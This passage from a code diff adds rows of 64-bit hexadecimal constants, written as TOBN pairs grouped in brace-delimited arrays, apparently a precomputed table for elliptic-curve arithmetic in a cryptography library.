+     TOBN(0x4e05df05, 0x57dfcfe9), TOBN(0x94b29cdd, 0x51ef6bf0),
+     TOBN(0xe4530cff, 0x9bc7edf2), TOBN(0x8ac236fd, 0xd3da65f3),
+     TOBN(0x0faf7d5f, 0xc8eb0b48), TOBN(0x4d2de14c, 0x660eb039),
+     TOBN(0xc006bba7, 0x60430e54), TOBN(0x10a2d0d6, 0xda3289ab),
+     TOBN(0x9c037a5d, 0xd7979c59), TOBN(0x04d1f3d3, 0xa116d944),
+     TOBN(0x9ff22473, 0x8a0983cd), TOBN(0x28e25b38, 0xc883cabb),
+     TOBN(0xe968dba5, 0x47a58995), TOBN(0x2c80b505, 0x774eebdf),
+     TOBN(0xee763b71, 0x4a953beb), TOBN(0x502e223f, 0x1642e7f6),
+     TOBN(0x6fe4b641, 0x61d5e722), TOBN(0x9d37c5b0, 0xdbef5316),
+     TOBN(0x0115ed70, 0xf8330bc7), TOBN(0x139850e6, 0x75a72789),
+     TOBN(0x27d7faec, 0xffceccc2), TOBN(0x3016a860, 0x4fd9f7f6),
+     TOBN(0xc492ec64, 0x4cd8f64c), TOBN(0x58a2d790, 0x279d7b51),
+     TOBN(0x0ced1fc5, 0x1fc75256), TOBN(0x3e658aed, 0x8f433017),
+     TOBN(0x0b61942e, 0x05da59eb), TOBN(0xba3d60a3, 0x0ddc3722),
+     TOBN(0x7c311cd1, 0x742e7f87), TOBN(0x6473ffee, 0xf6b01b6e),}
+    ,
+    {TOBN(0x8303604f, 0x692ac542), TOBN(0xf079ffe1, 0x227b91d3),
+     TOBN(0x19f63e63, 0x15aaf9bd), TOBN(0xf99ee565, 0xf1f344fb),
+     TOBN(0x8a1d661f, 0xd6219199), TOBN(0x8c883bc6, 0xd48ce41c),
+     TOBN(0x1065118f, 0x3c74d904), TOBN(0x713889ee, 0x0faf8b1b),
+     TOBN(0x972b3f8f, 0x81a1b3be), TOBN(0x4f3ce145, 0xce2764a0),
+     TOBN(0xe2d0f1cc, 0x28c4f5f7), TOBN(0xdeee0c0d, 0xc7f3985b),
+     TOBN(0x7df4adc0, 0xd39e25c3), TOBN(0x40619820, 0xc467a080),
+     TOBN(0x440ebc93, 0x61cf5a58), TOBN(0x527729a6, 0x422ad600),
+     TOBN(0xca6c0937, 0xb1b76ba6), TOBN(0x1a2eab85, 0x4d2026dc),
+     TOBN(0xb1715e15, 0x19d9ae0a), TOBN(0xf1ad9199, 0xbac4a026),
+     TOBN(0x35b3dfb8, 0x07ea7b0e), TOBN(0xedf5496f, 0x3ed9eb89),
+     TOBN(0x8932e5ff, 0x2d6d08ab), TOBN(0xf314874e, 0x25bd2731),
+     TOBN(0xefb26a75, 0x3f73f449), TOBN(0x1d1c94f8, 0x8d44fc79),
+     TOBN(0x49f0fbc5, 0x3bc0dc4d), TOBN(0xb747ea0b, 0x3698a0d0),
+     TOBN(0x5218c3fe, 0x228d291e), TOBN(0x35b804b5, 0x43c129d6),
+     TOBN(0xfac859b8, 0xd1acc516), TOBN(0x6c10697d, 0x95d6e668),
+     TOBN(0xc38e438f, 0x0876fd4e), TOBN(0x45f0c307, 0x83d2f383),
+     TOBN(0x203cc2ec, 0xb10934cb), TOBN(0x6a8f2439, 0x2c9d46ee),
+     TOBN(0xf16b431b, 0x65ccde7b), TOBN(0x41e2cd18, 0x27e76a6f),
+     TOBN(0xb9c8cf8f, 0x4e3484d7), TOBN(0x64426efd, 0x8315244a),
+     TOBN(0x1c0a8e44, 0xfc94dea3), TOBN(0x34c8cdbf, 0xdad6a0b0),
+     TOBN(0x919c3840, 0x04113cef), TOBN(0xfd32fba4, 0x15490ffa),
+     TOBN(0x58d190f6, 0x795dcfb7), TOBN(0xfef01b03, 0x83588baf),
+     TOBN(0x9e6d1d63, 0xca1fc1c0), TOBN(0x53173f96, 0xf0a41ac9),
+     TOBN(0x2b1d402a, 0xba16f73b), TOBN(0x2fb31014, 0x8cf9b9fc),
+     TOBN(0x2d51e60e, 0x446ef7bf), TOBN(0xc731021b, 0xb91e1745),
+     TOBN(0x9d3b4724, 0x4fee99d4), TOBN(0x4bca48b6, 0xfac5c1ea),
+     TOBN(0x70f5f514, 0xbbea9af7), TOBN(0x751f55a5, 0x974c283a),
+     TOBN(0x6e30251a, 0xcb452fdb), TOBN(0x31ee6965, 0x50f30650),
+     TOBN(0xb0b3e508, 0x933548d9), TOBN(0xb8949a4f, 0xf4b0ef5b),
+     TOBN(0x208b8326, 0x3c88f3bd), TOBN(0xab147c30, 0xdb1d9989),
+     TOBN(0xed6515fd, 0x44d4df03), TOBN(0x17a12f75, 0xe72eb0c5),
+     TOBN(0x3b59796d, 0x36cf69db), TOBN(0x1219eee9, 0x56670c18),
+     TOBN(0xfe3341f7, 0x7a070d8e), TOBN(0x9b70130b, 0xa327f90c),
+     TOBN(0x36a32462, 0x0ae18e0e), TOBN(0x2021a623, 0x46c0a638),
+     TOBN(0x251b5817, 0xc62eb0d4), TOBN(0x87bfbcdf, 0x4c762293),
+     TOBN(0xf78ab505, 0xcdd61d64), TOBN(0x8c7a53fc, 0xc8c18857),
+     TOBN(0xa653ce6f, 0x16147515), TOBN(0x9c923aa5, 0xea7d52d5),
+     TOBN(0xc24709cb, 0x5c18871f), TOBN(0x7d53bec8, 0x73b3cc74),
+     TOBN(0x59264aff, 0xfdd1d4c4), TOBN(0x5555917e, 0x240da582),
+     TOBN(0xcae8bbda, 0x548f5a0e), TOBN(0x1910eaba, 0x3bbfbbe1),
+     TOBN(0xae579685, 0x7677afc3), TOBN(0x49ea61f1, 0x73ff0b5c),
+     TOBN(0x78655478, 0x4f7c3922), TOBN(0x95d337cd, 0x20c68eef),
+     TOBN(0x68f1e1e5, 0xdf779ab9), TOBN(0x14b491b0, 0xb5cf69a8),
+     TOBN(0x7a6cbbe0, 0x28e3fe89), TOBN(0xe7e1fee4, 0xc5aac0eb),
+     TOBN(0x7f47eda5, 0x697e5140), TOBN(0x4f450137, 0xb454921f),
+     TOBN(0xdb625f84, 0x95cd8185), TOBN(0x74be0ba1, 0xcdb2e583),
+     TOBN(0xaee4fd7c, 0xdd5e6de4), TOBN(0x4251437d, 0xe8101739),
+     TOBN(0x686d72a0, 0xac620366), TOBN(0x4be3fb9c, 0xb6d59344),
+     TOBN(0x6e8b44e7, 0xa1eb75b9), TOBN(0x84e39da3, 0x91a5c10c),
+     TOBN(0x37cc1490, 0xb38f0409), TOBN(0x02951943, 0x2c2ade82),
+     TOBN(0x9b688783, 0x1190a2d8), TOBN(0x25627d14, 0x231182ba),
+     TOBN(0x6eb550aa, 0x658a6d87), TOBN(0x1405aaa7, 0xcf9c7325),
+     TOBN(0xd147142e, 0x5c8748c9), TOBN(0x7f637e4f, 0x53ede0e0),
+     TOBN(0xf8ca2776, 0x14ffad2c), TOBN(0xe58fb1bd, 0xbafb6791),
+     TOBN(0x17158c23, 0xbf8f93fc), TOBN(0x7f15b373, 0x0a4a4655),
+     TOBN(0x39d4add2, 0xd842ca72), TOBN(0xa71e4391, 0x3ed96305),
+     TOBN(0x5bb09cbe, 0x6700be14), TOBN(0x68d69d54, 0xd8befcf6),
+     TOBN(0xa45f5367, 0x37183bcf), TOBN(0x7152b7bb, 0x3370dff7),
+     TOBN(0xcf887baa, 0xbf12525b), TOBN(0xe7ac7bdd, 0xd6d1e3cd),
+     TOBN(0x25914f78, 0x81fdad90), TOBN(0xcf638f56, 0x0d2cf6ab),
+     TOBN(0xb90bc03f, 0xcc054de5), TOBN(0x932811a7, 0x18b06350),
+     TOBN(0x2f00b330, 0x9bbd11ff), TOBN(0x76108a6f, 0xb4044974),
+     TOBN(0x801bb9e0, 0xa851d266), TOBN(0x0dd099be, 0xbf8990c1),
+     TOBN(0x58c5aaaa, 0xabe32986), TOBN(0x0fe9dd2a, 0x50d59c27),
+     TOBN(0x84951ff4, 0x8d307305), TOBN(0x6c23f829, 0x86529b78),
+     TOBN(0x50bb2218, 0x0b136a79), TOBN(0x7e2174de, 0x77a20996),
+     TOBN(0x6f00a4b9, 0xc0bb4da6), TOBN(0x89a25a17, 0xefdde8da),
+     TOBN(0xf728a27e, 0xc11ee01d), TOBN(0xf900553a, 0xe5f10dfb),
+     TOBN(0x189a83c8, 0x02ec893c), TOBN(0x3ca5bdc1, 0x23f66d77),
+     TOBN(0x98781537, 0x97eada9f), TOBN(0x59c50ab3, 0x10256230),
+     TOBN(0x346042d9, 0x323c69b3), TOBN(0x1b715a6d, 0x2c460449),
+     TOBN(0xa41dd476, 0x6ae06e0b), TOBN(0xcdd7888e, 0x9d42e25f),
+     TOBN(0x0f395f74, 0x56b25a20), TOBN(0xeadfe0ae, 0x8700e27e),
+     TOBN(0xb09d52a9, 0x69950093), TOBN(0x3525d9cb, 0x327f8d40),
+     TOBN(0xb8235a94, 0x67df886a), TOBN(0x77e4b0dd, 0x035faec2),
+     TOBN(0x115eb20a, 0x517d7061), TOBN(0x77fe3433, 0x6c2df683),
+     TOBN(0x6870ddc7, 0xcdc6fc67), TOBN(0xb1610588, 0x0b87de83),
+     TOBN(0x343584ca, 0xd9c4ddbe), TOBN(0xb3164f1c, 0x3d754be2),
+     TOBN(0x0731ed3a, 0xc1e6c894), TOBN(0x26327dec, 0x4f6b904c),
+     TOBN(0x9d49c6de, 0x97b5cd32), TOBN(0x40835dae, 0xb5eceecd),
+     TOBN(0xc66350ed, 0xd9ded7fe), TOBN(0x8aeebb5c, 0x7a678804),
+     TOBN(0x51d42fb7, 0x5b8ee9ec), TOBN(0xd7a17bdd, 0x8e3ca118),
+     TOBN(0x40d7511a, 0x2ef4400e), TOBN(0xc48990ac, 0x875a66f4),
+     TOBN(0x8de07d2a, 0x2199e347), TOBN(0xbee75556, 0x2a39e051),
+     TOBN(0x56918786, 0x916e51dc), TOBN(0xeb191313, 0x4a2d89ec),
+     TOBN(0x6679610d, 0x37d341ed), TOBN(0x434fbb41, 0x56d51c2b),
+     TOBN(0xe54b7ee7, 0xd7492dba), TOBN(0xaa33a79a, 0x59021493),
+     TOBN(0x49fc5054, 0xe4bd6d3d), TOBN(0x09540f04, 0x5ab551d0),
+     TOBN(0x8acc9085, 0x4942d3a6), TOBN(0x231af02f, 0x2d28323b),
+     TOBN(0x93458cac, 0x0992c163), TOBN(0x1fef8e71, 0x888e3bb4),
+     TOBN(0x27578da5, 0xbe8c268c), TOBN(0xcc8be792, 0xe805ec00),
+     TOBN(0x29267bae, 0xc61c3855), TOBN(0xebff429d, 0x58c1fd3b),
+     TOBN(0x22d886c0, 0x8c0b93b8), TOBN(0xca5e00b2, 0x2ddb8953),
+     TOBN(0xcf330117, 0xc3fed8b7), TOBN(0xd49ac6fa, 0x819c01f6),
+     TOBN(0x6ddaa6bd, 0x3c0fbd54), TOBN(0x91743068, 0x8049a2cf),
+     TOBN(0xd67f981e, 0xaff2ef81), TOBN(0xc3654d35, 0x2818ae80),
+     TOBN(0x81d05044, 0x1b2aa892), TOBN(0x2db067bf, 0x3d099328),
+     TOBN(0xe7c79e86, 0x703dcc97), TOBN(0xe66f9b37, 0xe133e215),
+     TOBN(0xcdf119a6, 0xe39a7a5c), TOBN(0x47c60de3, 0x876f1b61),
+     TOBN(0x6e405939, 0xd860f1b2), TOBN(0x3e9a1dbc, 0xf5ed4d4a),
+     TOBN(0x3f23619e, 0xc9b6bcbd), TOBN(0x5ee790cf, 0x734e4497),
+     TOBN(0xf0a834b1, 0x5bdaf9bb), TOBN(0x02cedda7, 0x4ca295f0),
+     TOBN(0x4619aa2b, 0xcb8e378c), TOBN(0xe5613244, 0xcc987ea4),
+     TOBN(0x0bc022cc, 0x76b23a50), TOBN(0x4a2793ad, 0x0a6c21ce),
+     TOBN(0x38328780, 0x89cac3f5), TOBN(0x29176f1b, 0xcba26d56),
+     TOBN(0x06296187, 0x4f6f59eb), TOBN(0x86e9bca9, 0x8bdc658e),
+     TOBN(0x2ca9c4d3, 0x57e30402), TOBN(0x5438b216, 0x516a09bb),
+     TOBN(0x0a6a063c, 0x7672765a), TOBN(0x37a3ce64, 0x0547b9bf),
+     TOBN(0x42c099c8, 0x98b1a633), TOBN(0xb5ab800d, 0x05ee6961),
+     TOBN(0xf1963f59, 0x11a5acd6), TOBN(0xbaee6157, 0x46201063),
+     TOBN(0x36d9a649, 0xa596210a), TOBN(0xaed04363, 0x1ba7138c),
+     TOBN(0xcf817d1c, 0xa4a82b76), TOBN(0x5586960e, 0xf3806be9),
+     TOBN(0x7ab67c89, 0x09dc6bb5), TOBN(0x52ace7a0, 0x114fe7eb),
+     TOBN(0xcd987618, 0xcbbc9b70), TOBN(0x4f06fd5a, 0x604ca5e1),
+     TOBN(0x90af14ca, 0x6dbde133), TOBN(0x1afe4322, 0x948a3264),
+     TOBN(0xa70d2ca6, 0xc44b2c6c), TOBN(0xab726799, 0x0ef87dfe),
+     TOBN(0x310f64dc, 0x2e696377), TOBN(0x49b42e68, 0x4c8126a0),
+     TOBN(0x0ea444c3, 0xcea0b176), TOBN(0x53a8ddf7, 0xcb269182),
+     TOBN(0xf3e674eb, 0xbbba9dcb), TOBN(0x0d2878a8, 0xd8669d33),
+     TOBN(0x04b935d5, 0xd019b6a3), TOBN(0xbb5cf88e, 0x406f1e46),
+     TOBN(0xa1912d16, 0x5b57c111), TOBN(0x9803fc21, 0x19ebfd78),
+     TOBN(0x4f231c9e, 0xc07764a9), TOBN(0xd93286ee, 0xb75bd055),
+     TOBN(0x83a9457d, 0x8ee6c9de), TOBN(0x04695915, 0x6087ec90),
+     TOBN(0x14c6dd8a, 0x58d6cd46), TOBN(0x9cb633b5, 0x8e6634d2),
+     TOBN(0xc1305047, 0xf81bc328), TOBN(0x12ede0e2, 0x26a177e5),
+     TOBN(0x332cca62, 0x065a6f4f), TOBN(0xc3a47ecd, 0x67be487b),
+     TOBN(0x741eb187, 0x0f47ed1c), TOBN(0x99e66e58, 0xe7598b14),
+     TOBN(0x6f0544ca, 0x63d0ff12), TOBN(0xe5efc784, 0xb610a05f),
+     TOBN(0xf72917b1, 0x7cad7b47), TOBN(0x3ff6ea20, 0xf2cac0c0),
+     TOBN(0xcc23791b, 0xf21db8b7), TOBN(0x7dac70b1, 0xd7d93565),
+     TOBN(0x682cda1d, 0x694bdaad), TOBN(0xeb88bb8c, 0x1023516d),
+     TOBN(0xc4c634b4, 0xdfdbeb1b), TOBN(0x22f5ca72, 0xb4ee4dea),
+     TOBN(0x1045a368, 0xe6524821), TOBN(0xed9e8a3f, 0x052b18b2),
+     TOBN(0x9b7f2cb1, 0xb961f49a), TOBN(0x7fee2ec1, 0x7b009670),
+     TOBN(0x350d8754, 0x22507a6d), TOBN(0x561bd711, 0x4db55f1d),
+     TOBN(0x4c189ccc, 0x320bbcaf), TOBN(0x568434cf, 0xdf1de48c),
+     TOBN(0x6af1b00e, 0x0fa8f128), TOBN(0xf0ba9d02, 0x8907583c),
+     TOBN(0x735a4004, 0x32ff9f60), TOBN(0x3dd8e4b6, 0xc25dcf33),
+     TOBN(0xf2230f16, 0x42c74cef), TOBN(0xd8117623, 0x013fa8ad),
+     TOBN(0x36822876, 0xf51fe76e), TOBN(0x8a6811cc, 0x11d62589),
+     TOBN(0xc3fc7e65, 0x46225718), TOBN(0xb7df2c9f, 0xc82fdbcd),
+     TOBN(0x3b1d4e52, 0xdd7b205b), TOBN(0xb6959478, 0x47a2e414),
+     TOBN(0x05e4d793, 0xefa91148), TOBN(0xb47ed446, 0xfd2e9675),
+     TOBN(0x1a7098b9, 0x04c9d9bf), TOBN(0x661e2881, 0x1b793048),
+     TOBN(0xb1a16966, 0xb01ee461), TOBN(0xbc521308, 0x2954746f),
+     TOBN(0xc909a0fc, 0x2477de50), TOBN(0xd80bb41c, 0x7dbd51ef),
+     TOBN(0xa85be7ec, 0x53294905), TOBN(0x6d465b18, 0x83958f97),
+     TOBN(0x16f6f330, 0xfb6840fd), TOBN(0xfaaeb214, 0x3401e6c8),
+     TOBN(0xaf83d30f, 0xccb5b4f8), TOBN(0x22885739, 0x266dec4b),
+     TOBN(0x51b4367c, 0x7bc467df), TOBN(0x926562e3, 0xd842d27a),
+     TOBN(0xdfcb6614, 0x0fea14a6), TOBN(0xeb394dae, 0xf2734cd9),
+     TOBN(0x3eeae5d2, 0x11c0be98), TOBN(0xb1e6ed11, 0x814e8165),
+     TOBN(0x191086bc, 0xe52bce1c), TOBN(0x14b74cc6, 0xa75a04da),
+     TOBN(0x63cf1186, 0x8c060985), TOBN(0x071047de, 0x2dbd7f7c),
+     TOBN(0x4e433b8b, 0xce0942ca), TOBN(0xecbac447, 0xd8fec61d),
+     TOBN(0x8f0ed0e2, 0xebf3232f), TOBN(0xfff80f9e, 0xc52a2edd),
+     TOBN(0xad9ab433, 0x75b55fdb), TOBN(0x73ca7820, 0xe42e0c11),
+     TOBN(0x6dace0a0, 0xe6251b46), TOBN(0x89bc6b5c, 0x4c0d932d),
+     TOBN(0x3438cd77, 0x095da19a), TOBN(0x2f24a939, 0x8d48bdfb),
+     TOBN(0x99b47e46, 0x766561b7), TOBN(0x736600e6, 0x0ed0322a),
+     TOBN(0x06a47cb1, 0x638e1865), TOBN(0x927c1c2d, 0xcb136000),
+     TOBN(0x29542337, 0x0cc5df69), TOBN(0x99b37c02, 0x09d649a9),
+     TOBN(0xc5f0043c, 0x6aefdb27), TOBN(0x6cdd9987, 0x1be95c27),
+     TOBN(0x69850931, 0x390420d2), TOBN(0x299c40ac, 0x0983efa4),
+     TOBN(0x3a05e778, 0xaf39aead), TOBN(0x84274408, 0x43a45193),
+     TOBN(0x6bcd0fb9, 0x91a711a0), TOBN(0x461592c8, 0x9f52ab17),
+     TOBN(0xb49302b4, 0xda3c6ed6), TOBN(0xc51fddc7, 0x330d7067),
+     TOBN(0x94babeb6, 0xda50d531), TOBN(0x521b840d, 0xa6a7b9da),
+     TOBN(0x5305151e, 0x404bdc89), TOBN(0x1bcde201, 0xd0d07449),
+     TOBN(0xf427a78b, 0x3b76a59a), TOBN(0xf84841ce, 0x07791a1b),
+     TOBN(0xebd314be, 0xbf91ed1c), TOBN(0x8e61d34c, 0xbf172943),
+     TOBN(0x1d5dc451, 0x5541b892), TOBN(0xb186ee41, 0xfc9d9e54),
+     TOBN(0x9d9f345e, 0xd5bf610d), TOBN(0x3e7ba65d, 0xf6acca9f),
+     TOBN(0x9dda787a, 0xa8369486), TOBN(0x09f9dab7, 0x8eb5ba53),
+     TOBN(0x5afb2033, 0xd6481bc3), TOBN(0x76f4ce30, 0xafa62104),
+     TOBN(0xa8fa00cf, 0xf4f066b5), TOBN(0x89ab5143, 0x461dafc2),
+     TOBN(0x44339ed7, 0xa3389998), TOBN(0x2ff862f1, 0xbc214903),
+     TOBN(0x2c88f985, 0xb05556e3), TOBN(0xcd96058e, 0x3467081e),
+     TOBN(0x7d6a4176, 0xedc637ea), TOBN(0xe1743d09, 0x36a5acdc),
+     TOBN(0x66fd72e2, 0x7eb37726), TOBN(0xf7fa264e, 0x1481a037),
+     TOBN(0x9fbd3bde, 0x45f4aa79), TOBN(0xed1e0147, 0x767c3e22),
+     TOBN(0x7621f979, 0x82e7abe2), TOBN(0x19eedc72, 0x45f633f8),
+     TOBN(0xe69b155e, 0x6137bf3a), TOBN(0xa0ad13ce, 0x414ee94e),
+     TOBN(0x93e3d524, 0x1c0e651a), TOBN(0xab1a6e2a, 0x02ce227e),
+     TOBN(0xe7af1797, 0x4ab27eca), TOBN(0x245446de, 0xbd444f39),
+     TOBN(0x59e22a21, 0x56c07613), TOBN(0x43deafce, 0xf4275498),
+     TOBN(0x10834ccb, 0x67fd0946), TOBN(0xa75841e5, 0x47406edf),
+     TOBN(0xebd6a677, 0x7b0ac93d), TOBN(0xa6e37b0d, 0x78f5e0d7),
+     TOBN(0x2516c096, 0x76f5492b), TOBN(0x1e4bf888, 0x9ac05f3a),
+     TOBN(0xcdb42ce0, 0x4df0ba2b), TOBN(0x935d5cfd, 0x5062341b),
+     TOBN(0x8a303333, 0x82acac20), TOBN(0x429438c4, 0x5198b00e),
+     TOBN(0x1d083bc9, 0x049d33fa), TOBN(0x58b82dda, 0x946f67ff),
+     TOBN(0xac3e2db8, 0x67a1d6a3), TOBN(0x62e6bead, 0x1798aac8),
+     TOBN(0xfc85980f, 0xde46c58c), TOBN(0xa7f69379, 0x69c8d7be),
+     TOBN(0x23557927, 0x837b35ec), TOBN(0x06a933d8, 0xe0790c0c),
+     TOBN(0x827c0e9b, 0x077ff55d), TOBN(0x53977798, 0xbb26e680),
+     TOBN(0x59530874, 0x1d9cb54f), TOBN(0xcca3f449, 0x4aac53ef),
+     TOBN(0x11dc5c87, 0xa07eda0f), TOBN(0xc138bccf, 0xfd6400c8),
+     TOBN(0x549680d3, 0x13e5da72), TOBN(0xc93eed82, 0x4540617e),
+     TOBN(0xfd3db157, 0x4d0b75c0), TOBN(0x9716eb42, 0x6386075b),
+     TOBN(0x0639605c, 0x817b2c16), TOBN(0x09915109, 0xf1e4f201),
+     TOBN(0x35c9a928, 0x5cca6c3b), TOBN(0xb25f7d1a, 0x3505c900),
+     TOBN(0xeb9f7d20, 0x630480c4), TOBN(0xc3c7b8c6, 0x2a1a501c),
+     TOBN(0x3f99183c, 0x5a1f8e24), TOBN(0xfdb118fa, 0x9dd255f0),
+     TOBN(0xb9b18b90, 0xc27f62a6), TOBN(0xe8f732f7, 0x396ec191),
+     TOBN(0x524a2d91, 0x0be786ab), TOBN(0x5d32adef, 0x0ac5a0f5),
+     TOBN(0x9b53d4d6, 0x9725f694), TOBN(0x032a76c6, 0x0510ba89),
+     TOBN(0x840391a3, 0xebeb1544), TOBN(0x44b7b88c, 0x3ed73ac3),
+     TOBN(0xd24bae7a, 0x256cb8b3), TOBN(0x7ceb151a, 0xe394cb12),
+     TOBN(0xbd6b66d0, 0x5bc1e6a8), TOBN(0xec70cecb, 0x090f07bf),
+     TOBN(0x270644ed, 0x7d937589), TOBN(0xee9e1a3d, 0x5f1dccfe),
+     TOBN(0xb0d40a84, 0x745b98d2), TOBN(0xda429a21, 0x2556ed40),
+     TOBN(0xf676eced, 0x85148cb9), TOBN(0x5a22d40c, 0xded18936),
+     TOBN(0x3bc4b9e5, 0x70e8a4ce), TOBN(0xbfd1445b, 0x9eae0379),
+     TOBN(0xf23f2c0c, 0x1a0bd47e), TOBN(0xa9c0bb31, 0xe1845531),
+     TOBN(0x9ddc4d60, 0x0a4c3f6b), TOBN(0xbdfaad79, 0x2c15ef44),
+     TOBN(0xce55a236, 0x7f484acc), TOBN(0x08653ca7, 0x055b1f15),
+     TOBN(0x2efa8724, 0x538873a3), TOBN(0x09299e5d, 0xace1c7e7),
+     TOBN(0x07afab66, 0xade332ba), TOBN(0x9be1fdf6, 0x92dd71b7),
+     TOBN(0xa49b5d59, 0x5758b11c), TOBN(0x0b852893, 0xc8654f40),
+     TOBN(0xb63ef6f4, 0x52379447), TOBN(0xd4957d29, 0x105e690c),
+     TOBN(0x7d484363, 0x646559b0), TOBN(0xf4a8273c, 0x49788a8e),
+     TOBN(0xee406cb8, 0x34ce54a9), TOBN(0x1e1c260f, 0xf86fda9b),
+     TOBN(0xe150e228, 0xcf6a4a81), TOBN(0x1fa3b6a3, 0x1b488772),
+     TOBN(0x1e6ff110, 0xc5a9c15b), TOBN(0xc6133b91, 0x8ad6aa47),
+     TOBN(0x8ac5d55c, 0x9dffa978), TOBN(0xba1d1c1d, 0x5f3965f2),
+     TOBN(0xf969f4e0, 0x7732b52f), TOBN(0xfceecdb5, 0xa5172a07),
+     TOBN(0xb0120a5f, 0x10f2b8f5), TOBN(0xc83a6cdf, 0x5c4c2f63),
+     TOBN(0x4d47a491, 0xf8f9c213), TOBN(0xd9e1cce5, 0xd3f1bbd5),
+     TOBN(0x0d91bc7c, 0xaba7e372), TOBN(0xfcdc74c8, 0xdfd1a2db),
+     TOBN(0x05efa800, 0x374618e5), TOBN(0x11216969, 0x15a7925e),
+     TOBN(0xd4c89823, 0xf6021c5d), TOBN(0x880d5e84, 0xeff14423),
+     TOBN(0x6523bc5a, 0x6dcd1396), TOBN(0xd1acfdfc, 0x113c978b),
+     TOBN(0xb0c164e8, 0xbbb66840), TOBN(0xf7f4301e, 0x72b58459),
+     TOBN(0xc29ad4a6, 0xa638e8ec), TOBN(0xf5ab8961, 0x46b78699),
+     TOBN(0x9dbd7974, 0x0e954750), TOBN(0x0121de88, 0x64f9d2c6),
+     TOBN(0x2e597b42, 0xd985232e), TOBN(0x55b6c3c5, 0x53451777),
+     TOBN(0xbb53e547, 0x519cb9fb), TOBN(0xf134019f, 0x8428600d),
+     TOBN(0x5a473176, 0xe081791a), TOBN(0x2f3e2263, 0x35fb0c08),
+     TOBN(0xb28c3017, 0x73d273b0), TOBN(0xccd21076, 0x7721ef9a),
+     TOBN(0x054cc292, 0xb650dc39), TOBN(0x662246de, 0x6188045e),
+     TOBN(0x904b52fa, 0x6b83c0d1), TOBN(0xa72df267, 0x97e9cd46),
+     TOBN(0x886b43cd, 0x899725e4), TOBN(0x2b651688, 0xd849ff22),
+     TOBN(0x60479b79, 0x02f34533), TOBN(0x5e354c14, 0x0c77c148),
+     TOBN(0xb4bb7581, 0xa8537c78), TOBN(0x188043d7, 0xefe1495f),
+     TOBN(0x9ba12f42, 0x8c1d5026), TOBN(0x2e0c8a26, 0x93d4aaab),
+     TOBN(0xbdba7b8b, 0xaa57c450), TOBN(0x140c9ad6, 0x9bbdafef),
+     TOBN(0x2067aa42, 0x25ac0f18), TOBN(0xf7b1295b, 0x04d1fbf3),
+     TOBN(0x14829111, 0xa4b04824), TOBN(0x2ce3f192, 0x33bd5e91),
+     TOBN(0x9c7a1d55, 0x8f2e1b72), TOBN(0xfe932286, 0x302aa243),
+     TOBN(0x497ca7b4, 0xd4be9554), TOBN(0xb8e821b8, 0xe0547a6e),
+     TOBN(0xfb2838be, 0x67e573e0), TOBN(0x05891db9, 0x4084c44b),
+     TOBN(0x91311373, 0x96c1c2c5), TOBN(0x6aebfa3f, 0xd958444b),
+     TOBN(0xac9cdce9, 0xe56e55c1), TOBN(0x7148ced3, 0x2caa46d0),
+     TOBN(0x2e10c7ef, 0xb61fe8eb), TOBN(0x9fd835da, 0xff97cf4d),}
+    ,
+    {TOBN(0xa36da109, 0x081e9387), TOBN(0xfb9780d7, 0x8c935828),
+     TOBN(0xd5940332, 0xe540b015), TOBN(0xc9d7b51b, 0xe0f466fa),
+     TOBN(0xfaadcd41, 0xd6d9f671), TOBN(0xba6c1e28, 0xb1a2ac17),
+     TOBN(0x066a7833, 0xed201e5f), TOBN(0x19d99719, 0xf90f462b),
+     TOBN(0xf431f462, 0x060b5f61), TOBN(0xa56f46b4, 0x7bd057c2),
+     TOBN(0x348dca6c, 0x47e1bf65), TOBN(0x9a38783e, 0x41bcf1ff),
+     TOBN(0x7a5d33a9, 0xda710718), TOBN(0x5a779987, 0x2e0aeaf6),
+     TOBN(0xca87314d, 0x2d29d187), TOBN(0xfa0edc3e, 0xc687d733),
+     TOBN(0x9df33621, 0x6a31e09b), TOBN(0xde89e44d, 0xc1350e35),
+     TOBN(0x29214871, 0x4ca0cf52), TOBN(0xdf379672, 0x0b88a538),
+     TOBN(0xc92a510a, 0x2591d61b), TOBN(0x79aa87d7, 0x585b447b),
+     TOBN(0xf67db604, 0xe5287f77), TOBN(0x1697c8bf, 0x5efe7a80),
+     TOBN(0x1c894849, 0xcb198ac7), TOBN(0xa884a93d, 0x0f264665),
+     TOBN(0x2da964ef, 0x9b200678), TOBN(0x3c351b87, 0x009834e6),
+     TOBN(0xafb2ef9f, 0xe2c4b44b), TOBN(0x580f6c47, 0x3326790c),
+     TOBN(0xb8480521, 0x0b02264a), TOBN(0x8ba6f9e2, 0x42a194e2),
+     TOBN(0xfc87975f, 0x8fb54738), TOBN(0x35160788, 0x27c3ead3),
+     TOBN(0x834116d2, 0xb74a085a), TOBN(0x53c99a73, 0xa62fe996),
+     TOBN(0x87585be0, 0x5b81c51b), TOBN(0x925bafa8, 0xbe0852b7),
+     TOBN(0x76a4fafd, 0xa84d19a7), TOBN(0x39a45982, 0x585206d4),
+     TOBN(0x499b6ab6, 0x5eb03c0e), TOBN(0xf19b7954, 0x72bc3fde),
+     TOBN(0xa86b5b9c, 0x6e3a80d2), TOBN(0xe4377508, 0x6d42819f),
+     TOBN(0xc1663650, 0xbb3ee8a3), TOBN(0x75eb14fc, 0xb132075f),
+     TOBN(0xa8ccc906, 0x7ad834f6), TOBN(0xea6a2474, 0xe6e92ffd),
+     TOBN(0x9d72fd95, 0x0f8d6758), TOBN(0xcb84e101, 0x408c07dd),
+     TOBN(0xb9114bfd, 0xa5e23221), TOBN(0x358b5fe2, 0xe94e742c),
+     TOBN(0x1c0577ec, 0x95f40e75), TOBN(0xf0155451, 0x3d73f3d6),
+     TOBN(0x9d55cd67, 0xbd1b9b66), TOBN(0x63e86e78, 0xaf8d63c7),
+     TOBN(0x39d934ab, 0xd3c095f1), TOBN(0x04b261be, 0xe4b76d71),
+     TOBN(0x1d2e6970, 0xe73e6984), TOBN(0x879fb23b, 0x5e5fcb11),
+     TOBN(0x11506c72, 0xdfd75490), TOBN(0x3a97d085, 0x61bcf1c1),
+     TOBN(0x43201d82, 0xbf5e7007), TOBN(0x7f0ac52f, 0x798232a7),
+     TOBN(0x2715cbc4, 0x6eb564d4), TOBN(0x8d6c752c, 0x9e570e29),
+     TOBN(0xf80247c8, 0x9ef5fd5d), TOBN(0xc3c66b46, 0xd53eb514),
+     TOBN(0x9666b401, 0x0f87de56), TOBN(0xce62c06f, 0xc6c603b5),
+     TOBN(0xae7b4c60, 0x7e4fc942), TOBN(0x38ac0b77, 0x663a9c19),
+     TOBN(0xcb4d20ee, 0x4b049136), TOBN(0x8b63bf12, 0x356a4613),
